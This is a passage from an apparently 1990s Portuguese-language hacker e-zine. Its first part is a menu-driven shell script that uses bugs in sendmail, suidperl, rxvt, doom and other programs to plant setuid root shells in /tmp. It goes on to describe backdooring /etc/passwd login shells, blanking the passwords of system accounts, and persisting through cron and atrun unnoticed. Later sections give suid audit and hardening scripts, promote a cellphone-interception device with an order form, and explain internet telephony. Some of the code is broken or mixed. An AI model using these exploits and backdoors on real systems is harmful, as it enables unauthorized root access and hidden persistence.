/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
chmod +x /tmp/-fuu
PATH=/tmp
}

link ( )
{ 
echo 
echo "Linkando a shell a algum arquivo"
echo
touch /tmp/link
ln /bin/sh /tmp/link
echo "Link feito, shell instalada!"
}

sendmail ( )
{ 
echo
echo "Sendmail 8.7.3 e 8.8.3"
echo "3 ways to Fuck da World! =)"
echo "main()                                                ">>/tmp/smtpd.c
echo "{                                                     ">>/tmp/smtpd.c
echo "  setuid(0); setgid(0);                               ">>/tmp/smtpd.c
echo "  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sm");      ">>/tmp/smtpd.c
echo "}                                                     ">>/tmp/smtpd.c
echo "main()                                                ">>/tmp/leshka.c
echo "{                                                     ">>/tmp/leshka.c
echo "  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         ">>/tmp/leshka.c
echo "}                                                     ">>/tmp/leshka.c
#mude esta linha, para ser compativel com o seu compilador em C
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
chmod +x /tmp/sm
}

suidperl ( )
{
echo 
echo "Suidperl exploit"
echo
if test -u /usr/bin/suidperl
then
echo "Arquivo existente"
else
echo "Arquivo inexistente!" 
fi
perl /tmp/suidperl
#criando o suidperl no /tmp!
#!/usr/bin/suidperl
$> = 0;                                     
$ENV{'PATH'} = '/bin:/usr/bin';             
$ENV{'IFS'} = '' if $ENV{'IFS'} ne '';
$execpath = "/bin/sh";                      
$execpath =~ /(.*)/;                        
$boom = $1;                                 
system $boom;                               
echo 
echo "done!"
}

doomshell ( )
{
echo
echo "The d0om shell b0g"
echo
#executando...
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include 
#include 
main() {
        if (fork()) while (getc(stdin));
        else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver
echo "Done..."
}

rxvt ( )
{
echo
echo "RXVT suid b0g"
echo
#Selecione o DISPLAY, se necessario para utilizar o X cliente
/bin/cp /bin/sh /tmp/rxvt
chmod +x /tmp/rxvt
rxvt -print-pipe /tmp/rxvt
}

if [ $EUID != 0 ]; then
   echo "The SUiD Shell systems Menu"
   echo "---'----'-----'-------'----"
   echo "The SUiD Shell systems Menu"
   echo
   echo "Escolha no menu a seguir a suid a ser instalada"
   echo "1:> Resizecon bug"
   echo "2:> Abusecon bug"
   echo "3:> Link shell sys"
   echo "4:> Sendmail suid shell bug"
   echo "5:> Suidperl"
   echo "6:> rwxvt suid"
   echo "7:> D0om shell"
   echo
   echo -e "Opcao: [ ]"
   read opcao
   case $opcao in
	1)resizecon;;
      2)abusecon;;
      3)link;;
      4)sendmail;;
 	5)suidperl
      6)doomshell;;
	7)rxvt;;
   esac
fi
-------------- suid.sh ----------------

[ATAQUE] - 4) outras suids a serem consideradas

	Aqui , eu irei colocar algumas outras suid q na minha opniao podem ser
executadas, caso vc nao tenha sucesso co outras!

	1) Alterando o passwd...

	Primeiro, consiga root, ou entao consiga bin, pelo menos tenha acesso
ao /etc/passwd, depois disto de um $joe /etc/passwd , vai aparecer algo
assim :

root:Wa@1#eWrWa:0:0:aROOTo:/root:/bin/csh

	Agora muda a ultima parte da linha, de /bin/sh para /tmp/sh , veja o 
codigo da /tmp/sh abaixo!

#!/bin/sh
touch /tmp/arooto
/bin/cp /bin/sh /tmp/arooto
chmod 4755 /tmp/arooto
/bin/sh
sleep 3 #para parecer q ta realmente indo...
#done!

	O q o arquivo faz eh, quando o root entrar no sistema, sera executado
este arquivo /tmp/sh , o q este faz, eh antes q o usuario entre no sistema
realmente , ele copie o /bin/sh para dentro do /tmp/arooto, colocar o 
atributo executavel para dentro do arooto, e depois executar o /bin/sh ou 
qualquer outra shell , como se nada tivesse acontecido! =) Isto pode ficar
rodando ai por meses e ninguem nem perceber!

	2) Alterando o passwd (a revolta...)

	Esta eh outra tecnica , para se alterar o passwd em funcao de se obter
mais uma shell, veja.... Algumas pessoas , como admins burros, nao conseguem
ainda, saber as senhas de usuarios como bin,postmaster,daemon,lp,sync,
shutdown,halt,mail,news,uucp,operator,games,man,nobody,ftp, e outros,
o q vc pode fazer eh: editar o passwd

postmaster:x:14:2:postmaster:/var/spool/mail:/bin/bash

	Entao, mais uma vez, vc retira o X ou os WaDeFWfd , referentes a senha
da linha de um usuario qualquer do passwd, depois de fazer isto, se logue
com o login , sendo o postmaster como login, automaticamente, vc caira em 
um shell, depois disto, execute este script:

#!/bin/bash
touch /tmp/postmaster
cp /bin/sh /tmp/postmaster
chmod +x /tmp/postmaster
#

	E pronto, vc tera uma shell no /tmp/postmaster, faca isto com todos os
usuarios do sistema (ou passwd =)) e tenha uma senha para cada usuario, 
simples e pratico!

	3) Vamos de cron?

	O crontab como jah discutido, eh um meio de executar programas e 
scripts em determinadas horas, minutos, dias, meses, etc.. O q nos podemos
fazer com ele? Hora, selecionar uma suid shell para ser executada no dia
tal, do mes tal.... Veja:

joe /usr/lib/cron/cron.allow

	E coloque uma linha mais ou menos assim (muda conforme voce quiser):
10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 /tmp/suidcron

E o codigo da suidcron...

#!/bin/sh
touch /tmp/suidcron
cp /bin/sh /tmp/suidcron
chmod +x /tmp/suidcron

Lembre-se q o codigo de tempo no crontab pode ser qualquer um q vc quiser,
lembrando q o criontab eh acessivel e reescrito , por qualquer um do sistema

	4) atrun bug
	O programa /usr/lib/atrun, q executa automaticamente arquivos BATCH,
roda privilegiadamente pelo cron, o diretorio /usr/spool/at tem permissao
-W- para todo mundo do sistema, o usuario entra no diretorio /usr/spool/at, 
executa o programa Setuid, entao ele ctrl+c no programa , criando um arquivo
core pelo programa tendo como dono root, e entao fez um link do at, para
um arquivo qualquer, entao quando o at for executado automaticamente o 
arquivo q faz parte do link, sera executado, dando a uid do root para aquele
programa.

	4.1) atrun bug [02]
	/usr/lib/crontab, link o crontab como /usr/spool/mail/blood, entao
mande um mail para blood , este mail ira mudar automaticamente a permissao 
do crontab para blood , entao edite o crontab e mude-o para alguns 
privilegios para voce.
+==========================================================================+
[DEFESA] - 1) Patches para arquivos suid vulneraveis

	O maior meio de se tornar um arquivo suid vulneravel, em um arquivo
setuid nao vulneravel, eh bem simples, transforme-o em um arquivo nao suid,
como ? Nao sabe usar o chmod, nao?
chmod -s /blah/blah/blah.sh

	Eh claro q empresas q sao auto-orgulhosas e muito monotonas, fazem 
patches para as suas vulneraveis shell's e outros programa, entao procure
sempre ficar de olho nos documentos da CERT e tbm , ficar de olho em patches
lancados pela vendedora do seu sistema operacional. Tbm visite a berkeley, 
eles sao cheios de frescuras e adoram lancar patches para programas....!
	
[DEFESA] - 2) Metodos de seguranca

	Aqui, eu vou colcoar varios scripts e tecnicas q vc pode fazer para 
checar a integridade de uma possivel suid no seu sistema.

	A linha "---s------" no comando ls -la em qquer diretorio, indica uma
SUID naquele especifico arquivo..... Para checar, a integridade de alguns
diretorios vitais, veja o script abaixo:

#!/bin/sh
ls -la /sbin >> /tmp/schk
ls -la /bin  >> /tmp/schk
ls -la /usr  >> /tmp/schk
ls -la /usr/lib >> /tmp/schk
ls -la /usr/lib/games >> /tmp/schk
ls -la /usr/bin >> /tmp/schk
ls -la /usr/sbin >> /tmp/schk
ls -la /var/ >> /tmp/schk
ls -la /var/spool >> /tmp/schk
ls -la /var/adm >> /tmp/schk
cat /tmp/schk

	Este script ira dar um ls -la nos diretorios mais ofensivos no caso de
suid e ira exportar o resultado para o arquivo /tmp/schk!

	Outra forma de se checar por suid's , eh simplesmente, checar 
diretamente por cada usuario no /etc/passwd, procurando por alguma backdoor
instalada nestes.... Use su ( conhece? ), parea este tipo de servico.

	Outra forma e' adaptando o arquivo etc/rc.d/rc.6, este script e' 
executado pelo runlevel 6 ( reeboot ), ou halt (1 ), ele killa todos os 
processos pendentes ( listados com o ps )e umount os drivers montados e
apaga todos os arquivos do /tmp, ou entao somente rode esta parte do script:

#!/bin/sh
echo "Tmp killer"
/bin/rm -rf /tmp/.[^.]*
/bin/rm -rf /tmp/*


[DEFESA] - 3) Anti-Suid script

	Este script foi feito pela Sekurity inc., (www.sekurity.org) qquer
duvida , ou credito, deve ser atribuida a eles e nao a phone9, ou a mim em
qualquer caso, mas o script sofreu algumas adicoes, no seuconteudo original,
por exemplo, eu adcionei, mais alguns arquivos a lista!

#!/bin/sh
# sekurity.org   Anti SUID script   1.0
# slakware96 install - no x-windows - after ssh install - 41 suid binaries
#
# in case you need to find all suid binaries on your system
# 
# find / -user root \( -perm -4001 -o -perm 2001 \) -exec -ldb {} \; >> /root/sekurity.audit
#
#
chmod 755 /usr/bin/at
chmod 711 /usr/bin/crontab
chmod 711 /usr/bin/splitvt
chmod 711 /usr/bin/chsh
chmod 711 /usr/bin/newgrp
chmod 711 /usr/bin/chfn
chmod 755 /usr/bin/dumpreg
chmod 755 /usr/bin/restorefont
chmod 755 /usr/bin/restorepalette
chmod 755 /usr/bin/restoretextmode
chmod 711 /usr/bin/procmail
chmod 711 /usr/bin/lpq
chmod 711 /usr/bin/lpr
chmod 711 /usr/bin/lprm
chmod 755 /usr/bin/rcp
chmod 755 /usr/bin/rlogin
chmod 755 /usr/bin/rsh
chmod 755 /usr/lib/svgalib/fun
chmod 755 /usr/lib/svgalib/mousetest
chmod 755 /usr/lib/svgalib/scrolltest
chmod 755 /usr/lib/svgalib/speedtest
chmod 755 /usr/lib/svgalib/testgl
chmod 755 /usr/lib/svgalib/testlinear
chmod 755 /usr/lib/svgalib/vgatest
chmod 755 /usr/lib/svgalib/3d
chmod 755 /usr/lib/svgalib/keytest
chmod 755 /usr/lib/svgalib/accel
chmod 755 /usr/lib/svgalib/eventtest
chmod 755 /usr/lib/svgalib/forktest
chmod 755 /usr/lib/svgalib/testaccel
chmod 711 /usr/sbin/pppd-2.1
chmod 711 /usr/sbin/pppd-2.2
chmod 711 /usr/games/sasteroids
chmod 755 /bin/mount
chmod 755 /bin/umount
chmod 711 /sbin/dip-3.3.7n
chmod -s /usr/X11R6/bin/color_xterm
chmod -s /sbin/dip
chmod -s /usr/games/doom/startmouse
chmod -s /usr/bin/dos
chmod -s /sbin/dump
chmod -s /usr/games/lizardlib/lizardshi
chmod -s /bin/mount
chmod -s /bin/umount
chmod -s /usr/bin/mh/inc
chmod -s /usr/bin/mh/msgchk
chmod -s /usr/bin/resizecons
chmod -s /usr/X11R6/bin/rxvt
chmod -s /usr/X11/bin/SuperProbe
chmod -s /usr/local/bin/workman
chmod -s /usr/lib/games/abuse/abuse.console
chmod -s /usr/X11R6/bin/X

[DEFESA] - 4) SSL - Suid Shell Locker

	Execute este programa, e procure por algumas Suids nos seu sistema!

if [ -s /usr/X11R6/bin/color_xterm ]
then
echo "Procurando por Suid em color_xterm...  "
	  if test -u /usr/X11R6/bin/color_xterm
        then
                echo "Warning... Suid existente"
                echo "/usr/X11R6/bin/color_xterm" >> ~/sec.log
		    echo "" >> ~/sec.log
		    echo ""
        else
                echo "color_xterm nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por Suid em color_xterm...  "
        echo "/usr/X11R6/bin/color_xterm nao existe ou nao esta instalada"
        echo ""
fi

if [ -s /sbin/dip ]
then
echo "Procurando por Suid em dip...  "
        if test -u /sbin/dip
        then
                echo "Warning... Suid existente"
                echo "/sbin/dip" >> ~/sec.log
                echo "" >> ~/sec.log
        else
                echo "/sbin/dip nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por suid /sbin/dip...  " >> ~/sec.log
        echo "/sbin/dip nao foi encontrado" >> ~/sec.log
        echo "" >> ~/sec.log
fi

if [ -s /usr/games/doom/startmouse ]
then
echo "Procurando por vulnerabilidade no Startmouse do DOOM...  "
        if test -u /usr/games/doom/startmouse
        then
                echo "Warning... Suid Existente" >> ~/sec.log
                echo "/usr/games/doom/startmouse" >> ~/sec.log
                echo ""
        else
                echo "/usr/games/doom/startmouse nao possui suid.."
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no Startmouse do DOOM... "
        echo "/usr/games/doom/startmouse nao foi encontrado" >> ~/sec.log
        echo "" >> ~/sec.log
fi

if [ -s /usr/bin/dos ] 
then
echo "Procurando por vulnerabilidade no DOS...  "
        if test -u /usr/bin/dos
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/bin/dos" >> ~/sec.log
                echo "" >> ~/sec.log
        else   
                echo "/usr/bin/dos nao possui suid" >> ~/sec.log
                echo "" >> ~/sec.log
        fi
else            
        echo "Procurando por vulnerabilidade no DOS...  " >> ~/sec.log
        echo "/usr/bin/dos nao foi encontrado" >> ~/sec.log
        echo "" >> ~/sec.log
fi

if [ -s /sbin/dump ] 
then
echo "Procurando por vulnerabilidade no DUMP (heh!)..  "
        if test -u /sbin/dump
        then
                echo "Warning... Suid Existente" >> ~/sec.log
                echo "/sbin/dump" >> ~/sec.log
                echo "" >> ~/sec.log
        else
                echo "/sbin/dump nao possui suid... " >> ~/sec.log
                echo "" >> ~/sec.loh
        fi
else
        echo "Procurando por vulnerabilidade no DUMP (heh!).. " >> ~/sec.log
        echo "/sbin/dump nao foi encontrado... " >> ~/sec.log
        echo "" >> ~/sec.log
fi

if [ -s /usr/games/lizardlib/lizardshi ]
then
echo "Procurando por vulnerabilidade no lizardshi...  "
        if test -u /usr/games/lizardlib/lizardshi
        then
                echo "Warning... Suid encontrada"
                echo "/usr/games/lizardlib/lizardshi" >> ~/sec.log
                echo "" >> ~/sec.log
        else
                echo "/usr/games/lizardlib/lizardshi nao possui suid..." >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no lizardshi...  "
        echo "/usr/games/liardlib/lizardshi nao foi encontrado... "
        echo ""
fi

if [ -s /bin/mount ]
then
echo "Procurando vulnerabilidade no mount... "
        if test -u /bin/mount
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/bin/mount" >> ~/sec.log
                echo "" >> ~/sec.log
        else
                echo "/bin/mount nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no mount... " >> ~/sec.log
        echo "/bin/mount nao foi encontrado..." >> ~/sec.log
	echo "" >> ~/sec.log
fi

if [ -s /bin/umount ] 
then
echo "Procurando por vulnerabilidade no umount... "
        if test -u /bin/umount
        then
                echo "Warning... Suid encontrada" >> ~/sec.log
                echo "/bin/umount" >> ~/sec.log
                echo "" >> ~/sec.log
        else
                echo "/bin/umount nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no umount... " >> ~/sec.log
        echo "/bin/umount nao foi encontrado " >> ~/sec.log
        echo "" >> ~/sec.log 
fi
if [ -s /usr/bin/mh/inc ] 
then
echo "Procurando por vulnerabilidade no inc..."
        if test -u /usr/bin/mh/inc
        then
                echo "Warning... Suid existente"
                echo "/usr/bin/mh/inc" >> ~/sec.log
                echo ""
        else
                echo "/usr/bin/mh/inc nao possui suid... "
                echo "" 
        fi
else
        echo "Procurando por vulnerabilidade no inc... "
        echo "/usr/bin/mh/inc nao foi encontrado... " >> ~/sec.log
        echo ""
fi

if [ -s /usr/bin/mh/msgchk ] 
then
echo "Procurando por vulnerabilidade no msgchk... "
        if test -u /usr/bin/mh/msgchk
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/bin/mh/msgchk" >> ~/sec.log
                echo ""
        else
                echo "/usr/bin/mh/msgchk nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no msgchk... " 
        echo "/usr/bin/mh/msgchk nao foi encontrado... " >> ~/sec.log
        echo ""
fi

if [ -s /usr/bin/resizecons ] 
then
echo "Procurando vulnerabilidade no resizecons...  "
        if test -u /usr/bin/resizecons
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/bin/resizecons" >> ~/sec.log
                echo ""
        else
                echo "/usr/bin/resizecons nao possui suid... " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando vulnerabilidades no resizecons... "
        echo "/usr/bin/resizecons nao foi encontrado... "
        echo ""
fi

if [ -s /usr/X11R6/bin/rxvt ] 
then
echo "Procurando por vulnerabilidade no rxvt... "
        if test -u /usr/X11R6/bin/rxvt
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/X11R6/bin/rxvt" >> ~/sec.log
                echo ""
        else
                echo "/usr/X11R6/bin/rxvt nao possui suid" >> ~/sec.log
                echo "" 
        fi      
else
        echo "Procurando por vulnerabilidade no rxvt... "
        echo "/usr/X11R6/bin/rxvt nao foi encontrado "
        echo ""
fi

if [ -s /usr/X11/bin/SuperProbe ]
then
echo "Procurando por vulnerabilidade no SupeProbe...  "
        if test -u /usr/X11/bin/SuperProbe
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/X11/bin/SuperProbe" >> ~/sec.log
                echo ""
        else
                echo "/usr/X11/bin/SuperProbe nao possui suid"
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no SuperProbe... "
        echo "/usr/X11/bin/SuperProbe nao foi encontrado... "
        echo ""
fi

if [ -s /usr/local/bin/workman ] 
then
echo "Procurando por vulnerabilidade no workman... "
        if test -u /usr/local/bin/workman
        then
                echo "Warning... Suid existente" >> ~/sec.log
                echo "/usr/local/bin/workman" >> ~/sec.log
                echo ""
        else
                echo "/usr/local/bin/workman nao possui suid" >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando por vulnerabilidade no workman... "
        echo "/usr/local/bin/workman nao foi encontrado..." >> ~/sec.log
        echo ""
fi

if [ -s /usr/lib/games/abuse/abuse.console ] 
then
echo "Procurando vulnerabilidade no abuse.console... "
        if test -u /usr/lib/games/abuse/abuse.console
        then
                echo "Warning... Suid existente"
                echo "/usr/lib/games/abuse/abuse.console" >> ~/sec.log
                echo ""
        else
                echo "/usr/lib/games/abuse/abuse.console nao possui suid " >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando vulnerabilidade no abuse.console... "
        echo "/usr/lib/games/abuse/abuse.console nao foi encontrado..." >> ~/sec.log
        echo ""
fi

if [ -s /usr/X11R6/bin/X ]
then
echo "Procurando vulnerabilidade no X... "
        if test -u /usr/X11R6/bin/X
        then
                echo "Warning... Suid Existente" >> ~/sec.log
                echo "/usr/X11R6/bin/X" >> ~/sec.log
                echo ""
        else
                echo "/usr/X11R6/bin/X nao possui suid" >> ~/sec.log
                echo ""
        fi
else
        echo "Procurando vulnerabilidade no X... "
        echo "/usr/X11R6/bin/X nao foi encontrado"
        echo ""
fi

the blood root (blood@puruca.com.br)
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Exclusive - *DDI Box* .................................: Acid Branch <:]

Bem vindo, a mais um relatorio praticamente exclusivo da Phone9, tendo em 
vista q realmente muito, mas muito poucos, liberam informacoes tao preciosas
como a DDI box. Phrack? Talvez, CCC? Provavelmente. Axur? Acredito q sim,
mas nos conseguimos os arquivos e agora o segredo esta exposto, Dr. Who q se
segure, agora eh a nossa vez.
	
			Digital Data Interpreter Test-mode (DDI)

	O DDI, eh um aparelho desenvolvido por algum lunatico e fanatico por
celulares, oq ele faz eh, simplesmente, desencripta a transferencia de dados
voz transmitidas pelo celular, podendo interceptar data-voz em sistemas GSM
se quiser, e tbm podendo interpretar e auto-executar os mesmo comandos q o 
celular envia para a CCC. O input do DDI, eh um receptor/transmissor de 
radio-frequencia (RF), o output eh uma pequena tela de cristal liquido de 
cerca de 9 polegadas, com um teclado, onde se eh possivel visualizar o texto
output, em SSDS (Standart Serial Data Systems), transmitidos a 9600 bauds.
	O DDI, funciona automaticamente com PCs e um periferico ou terminal
conectado ao um computador (laptop?). Exemplo:

 .----------------------------.   .----------------------------. 
 : NAC=15                     :   : Telefone tocando           : 
 : 555-4540 (312) Registration:   : Telefone para de tocar     : 
 : 555-4540 (312) GoTo 869.880:   : Disconecta da rede CCC     : 
 : 555-4540 (312) GoTo 869.880:   :                            : 
 : 555-3238 (312) Paging      :   : Telefone tocando           : 
 : 555-0186 (312) Paging      :   : Muda forca p/ .25 W        : 
 : 555-8252 (312) Paging      :   : Muda forca p/ 1.6 W        : 
 : 555-0186 (312) GoTo 891.090:   : Vai para canal 890.220     : 
 : 555-0186 (312) GoTo 891.090:   :                            : 
 :                            :   :                            : 
 `----------------------------'   `----------------------------'

	Eh assim q ele monitora um telefone, por exemplo, se o numero fosse
555-4540, ele iria checar todas as atividades do telefone ateh q ele se 
desconectasse da rede CCC, quando ele voltasse a rede, ele automaticamente
iria interceptar a data do celular, e depois imprimir o resultado no arquivo
SSDS!

	O diagrama da esquerda, mostra as funcoes q o celular acabou de fazer,
e no diagrama da direita, ele mostra as funcoes filtradas do celular, 
mudando as informacoes de simples codigos, para escrita e algo q vc possa
entender e te interesse!

Especificacoes DDI:

	O DDI precisa de um input de audio (conector de 3.55mm), este pode ser
retirado de um outro celular, radio ou qualquer outro aparelho digital!
	Um input periferico serial , iria conectar, em qualquer pora RS-232
de PCs. O DDI transmite em pin 2 e pin 9. O output do DDI, sai em um arquivo
SSDS.
	Alguns radios nao consegeum transmitir data pelo seu transmissor do 
auto-falante, caso o seu radio nao consigua, utilize um transmissor interno
de radio, q estes operam com maior forca e maior capacidade de conclusao! =)

Software:

Quando o DDI foi desenvolvido, ele foi programado para se entender com 
linguagens padroes de PCs e de hardware DDI's (ex.: PROCOMM) o DDI, vem com
um software q contem umas das mais avancadas tecnicas de comunicacao 
hardware+software. O software permite, total controle sobre comunicacao 
Radio e RS-232 , ICOM, DDI, podendo escolher opcoes de LOGs de certas 
funcoes, tbm podendo escolher, funcoes como mudar o canal a ser scaneado e 
tbm pode mudar o numero de cleular a ser scaneado, e eh claro, possui outras
sacanagens q vc gostaria de ver.

Ordering:

Tah achando q eh de graca!? na-na-ni-na-nao! Vc tem q pagar para ter o DDI,
e nao sou eu q vou perder o meu tempo, desenvolvendo sofisticados .gifs de
PCBs q ninguem vai nem olhar, entao, se vc compra, mas compra na fe q eu
garanto q chega na sua casa em poucos dias!

=======================================================================
                                 ORDER FORM

DDI Kit of parts $295                         
PCB Subassembly $305                         Name:________________________
Complete Commercial       
   Test Equipment Set $330     ________      Address:_____________________

AR-3000(A) Kit $18                           City/State/Zip:______________
PRO-200x Kit $18 
AR-2500 Kit $8                               MAIL ORDER TO:
R7000/R7100 Kit $8 
Generic Kit $18                ________             CCS
                                                    P.O. Box 11191
Shipping & Handling (USA)                           Milwaukee, WI  53211 
UPS $10, UPS BLUE $15                                              
UPS RED $25.                                                       
Add $5 for COD                 ________

Discounts:                                          Wisconsin residents 
Subtract $20 for each                               add 5% or 5.5% sales 
DDI purchased after                                 tax.
the first DDI.                 ________


                TOTAL          ________
=======================================================================

	Proxima edicao tem mais sobre DDI's!
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Estrutura INETphone ................................: The blood root <:]

	Vc nunca tentou ligar para o seu desconhecido tio q mora em manuas?
Ou entao para aquela puta q vc comeu com 15 anos na bahia? Mas vc nunca 
ligou, porque? > Mamae nao deixa ligar para outros estados > Mamae fica 
brava quando eu pego no telefone > Voce nao sabe o q eh telefone! =) Mas 
para os mais espertinhos, seria por causa da imensa conta q vc deveria pagar
no fim do mes! Mas agora, o usuario de internet pode fazer ligacoes pela 
internet e ligacoes inter-estaduais , e ateh mesmo internacionais , por meio
de um sistema chamado INETPhone. Muitos de vcs q visitaram a puruca.com.br, 
devem ter visitado aquela parte de telefonia, q faz um link direto para o
endereco www.chamadainternacional.com.br, este eh o endereco principal do 
net2phone, ou INETPhone no brasil! Mas como explicar o seu funcionamento, 
roteamento, e todas aqueles termos tecnicos do jargao? Depois de uma longa 
pesquisa q a phone9 fez, nos agora estamos trazendo uma documento explciando
passo a passo e nocoes a nivel de telefone na internet, entao aproveite =p

1. Prefacio a INETPhone
2. Pequena introducao...
3. Funcionamento
4. Estrutura INETPhone Servers
   4.1. Diretorio remoto
5. Conclusao
+--------------------------------------------------------------------------+
1) Prefacio a INETPhone
	
	Desde de o inicio, se imaginava esta tecnoligia a disposicao da net, 
tecnicamente ela era bastante facil de ser feita, mas nao eh tao agil quanto
parece, ela desenvolve um complicado processo e ainda cria uma imensa briga
com as telco's do mundo todo, imagina por q pagar 2,0 por o q pode ser 1,0?
	O INETPhone, basicamente eh uma tecnologia nova, e pretende mudar 
definitivamente os meios de comunicacoes telefonicas, ainda mais com a sua
facil implementacao na web.
	O intuito deste texto eh ensinar e dar uma boa base para quem deseja
aprender os aspectos tecnicos e funcionamento do INETPhone, sinta-se a 
vontade para me mandar um e-mail em blood@puruca.com.br!

2) Pequena introducao...

	A cerca de 2 ou 3 anos, uma empresa, da qual o nome eu nao faco ideia,
comecou a implantar um projeto de telefonia na web, depois de programas da
microsofts como Netmmeting e outros softwares desenvolvidos por empresas q
nao tem nada melhor para fazer =)
	Depois de varios meios de comunicacao como netmeeting, e-mail, FTP,
invasao, unix, mIRC, wwwchat, e outros, agora eh possivel utilizar o 
telefone pela internet e o melhor ainda , fazendo com q uma ligacao 
inter-estadual, seja dividida em duas ligacoes locais, q sao cada uma menos 
da metade do preco de uma ligacao inter-estadual!
	
3) Funcionamento

	Para se entender o funcionamento do INETPhone, eh necessario q se 
tenha na mente q o telefone foi adaptado a internet e nao a internet ao 
telefone, como muita gente pensa, esclarecido isto, eu comeco a explicar o 
seu funcionamento!
	Digamos q o usuario A , queira fazer uma ligacao para o usuario B,
sabendo q o usuario A , tem o seu codigo de area 234, e o usuario B tem o 
seu codigo de area 567, ambos vivendo sobre o codigo de cidade 021!
	O usuario A, q se conectou a internet pelo telefone 234-5678, por uma 
central digital q habilita e tem o servidor netphone instalado na sua 
central, executa o seu net2phone e disca para o usuario B, o usuario B se 
conectou a internet pelo telefone 567-8900, tbm tem uma central digital, q 
habilita o servico INETPhone, o usuario A, envia as informacoes para o seu
servidor , dentro deste pacote, ele envia o pedido de handshake, entre o 
seu servidor (mandic.com.br) e o servidor da netphone (net2phone.com.br),
o servidor net2phone, verifica fontes como IP, servidor, tempo de conexao,
login, codigo de area e telefone, depois q ele comprovou a verdadeira fonte
dos do usuario A, o servidor net2phone, ira se conectar por meio de um 
gateway com a central, ele ira mandar o servidor na central , discar para o 
codigo de area do usuario B, ao discar para o codigo de area do usuario B,
a rede net2phone, checase o servidor realmente trabalha com o sistema 
net2phone, caso nao, a conexao volta com uma mensagem de erro, "O servidor
para onde sta ligando nao compreende o sistema net2phone, favor contactar o
distribuidor do software", ou algo assim, caso ele aceite a conexao, esta 
central do usuario B, ira se conectar a uma porta especifica do provedor,
enviando o pedido de conexao entre o usuario A e B, se aceita a conexao, 
eh criado um link entre o usuario A, servidor A , central A, e a central B, 
o servidor B e o usuario B, este lin permanece, ateh q a ligacao seja 
completa!
	Como fica obvio, uma ligacao direta, eh transformada em duas 
automaticamente, isto beneficia os usuarios de outras cidades, estados, 
paises e mundos (quem disse q nao pode?), fazendo com q a primeira ligacao
seja, a do servidor net2phone para a central local do usuario A e da central
LOCAL, para o net2phone B! Caso vc ainda nao tenha entendido direito, veja
como funciona uma ligacao entre duas cidades:

A [------[CENTRAL A]---[Rede Tele. A]--|--[Rede Tele. B]-[CENTRAL B]-----] B

	Ou seja, eh uma conexao direta entre a sua central, a sua rede 
telefonica, com uma rede telefonica de outro pais, e com a central 
telefonica de outro usuario de outro pais! O q a torna mais cara ainda! =)
	Jah no caso net2phone, veja

A [-[NET2PHONE]-[-CENTRAL A]-(link de internet)-[CENTRAL B]-[NET2PHONE]-] B

	Veja q a primeira ligacao, eh entre a NET2PHONE e a central de quem 
esta originando a chamada, depois a central A, q esta conectada por meio da
internet a uma rede de todos os servidores NET2PHONE, ira enviar o pedido de
ligacao para a central B, tanto a central A quando a central B, possuem um
sistema de identificacao NET2PHONE, caso o contrario nao existe meio de se 
fazer esta ligacao, depois q a central liga para o servidor net2phone, este
ira enviar por meio do servidor do usuario B, a ligacao e assim fica o link,
as duas ligacoes, da NET2PHONE para a central e da central B para a 
NET2PHONE! Levando em conta q eh uma lgiacao local do servidor 234 para a 
central 234 e tbm eh uma ligacao local da central 567 para o servidor nt2ph
do codigo de area 567! 

4) Estrutura INETPhone Servers

	Quanto aos servidores NET2PHONE q sao fundamentais, eh necessaria uma
explicacao detalhada sobre estes.
	O elemento central e principal do servidores, eh o seu servidor na 
internet, o servidor age como um gateway entre a rede telefonica e a 
internet, por estas razoes o servidor tem a interface telefonica (localizada
na central telefonica) e a interface internetica (localizada no servidor 
net2phone). Atualmente existem varias maneiras e varias empresas q 
possibilitam servidores como estes na internet, uma das ferramentas mais 
sofisticadas eh Dialogic's Voice Boards, q hoje esta sendo usada na AOL =(
esta pode originar e receber ligacoes, tons DTMF, gravacao de ligacoes
compressao digital de data/voz, monitoramento de progresso.
	Tudo isto necessita de um background repleto de funcoes q o servidor
deve ter para ser um servidor inetphone

(a) Receber ligacoes locais, e/ou conexoes de servidores locais por meio de
um gateway remoto
(b) Identificar o PIN de uma ligacao local e determinar o procedimento de 
aceitacao, ou nao da ligacao!
(c) Aceitar um numero remoto, para ligacao remota em sistemas locais
(d) Procurar por um diretorio remoto no servidor, de onde foi originado o 
pedido de ligacao
(e) Fazer conexao com um servidor remoto
(f) Fazer uma ligacao local , segundo determinacao do servidor remoto
